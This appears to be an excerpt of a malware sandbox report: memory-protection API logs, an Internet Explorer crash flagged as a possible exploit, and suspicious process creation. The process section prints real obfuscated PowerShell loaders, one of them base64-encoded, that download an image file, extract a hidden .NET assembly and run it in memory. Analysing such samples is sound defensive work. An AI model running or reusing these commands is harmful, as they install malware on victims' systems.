NtAllocateVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003240000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003060000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:55 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feecb09000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 region_size: 2953216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003140000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077186000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d6000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077181000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076ba0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772af000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772bb000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe117000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 28, 2023, 9:54 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbe4000 process_handle: 0xffffffffffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2172 crashed
__exception__ Nov. 28, 2023, 9:55 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda5a49d registers.r14: 0 registers.r15: 0 registers.rcx: 106226480 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 106232432 registers.r11: 106228240 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1902736312 registers.r13: 0	1	0	0

Application Crash

Process iexplore.exe with pid 2172 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Nov. 28, 2023, 9:55 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOMe[4]+$pSHome[34]+'X') ( (('{1}ima'+'geUrl = {0}https://uploaddeimagens.com.br/images/004/667/608/o'+'riginal/hta.jpg?1700268840{0};{1}webClient = New-Object System.Net.WebClient;{1}imag'+'eBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding]::UTF8.GetString({1}imageBy'+'tes);{1}startFlag = {0}<'+'<BASE64_STA'+'RT>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += '+'{1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}ba'+'se64Command = {1}im'+'ageText'+'.'+'Substring({1}startIndex, {1}base64Le'+'ngth);{1}'+'c'+'ommandBytes = [S'+'yste'+'m.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]::Load({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}dHh0LmtjaXBodG'+'9vdC8wMzEuODQyLjI5LjE5Ly86cHR0aA=={0} , {0}dfdfd{0'+'} , {0}dfdf{0} , {0}d'+'fdf{0} , {0'+'}dadsa{0} , {0}de{0} , {0}cu{0}))') -F [cHAR]39,[cHAR]36))"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
